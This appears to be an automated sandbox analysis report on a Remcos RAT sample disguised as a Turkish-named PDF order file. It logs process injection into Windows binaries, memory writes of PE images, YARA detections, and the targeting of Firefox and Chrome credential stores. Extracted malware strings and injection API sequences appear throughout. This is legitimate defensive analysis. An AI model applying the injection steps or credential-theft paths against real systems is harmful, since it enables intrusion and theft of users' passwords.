                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 840000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 850000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10540000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 860000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 870000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1010000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 4BA0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3060000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3070000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30C0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30D0000Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 940000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 9D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 9E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 9F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: C00000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: C10000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 950000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 960000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 970000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 980000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 990000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 5F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 880000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: C50000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 800000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 810000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 820000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 830000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 840000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 850000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 860000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 870000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1010000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 4BA0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3060000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3070000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30D0000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 value starts with: 4D5AJump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_0040F219
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 940000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: C00000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 970000Jump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 990000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 5F0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 810000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 850000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 870000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 1000000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3070000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30B0000Jump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30D0000Jump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe3_2_0040A5F5
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_00410145
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3|
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program ManagerJS;.
                    Source: logagent.exe, 00000003.00000002.533920731.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,3_2_00409E7D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoA,3_2_1054B80C
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_004124A0 cpuid 3_2_004124A0
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread,3_2_00402580
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00412163

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_0040728F
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: \key3.db3_2_0040728F
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_0040710F

                    Remote Access Functionality

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
                    Detected Remcos RAT
                    Source: logagent.exeString found in binary or memory: Remcos_Mutex_Inj
                    Source: logagent.exe, 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: logagent.exe, 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.1 Propth_unencoverridev
                    Source: logagent.exe, 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_Inj
                    Source: logagent.exe, 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.1 Propth_unencoverridev
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: cmd.exe3_2_00402B8A

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Native API                    		1
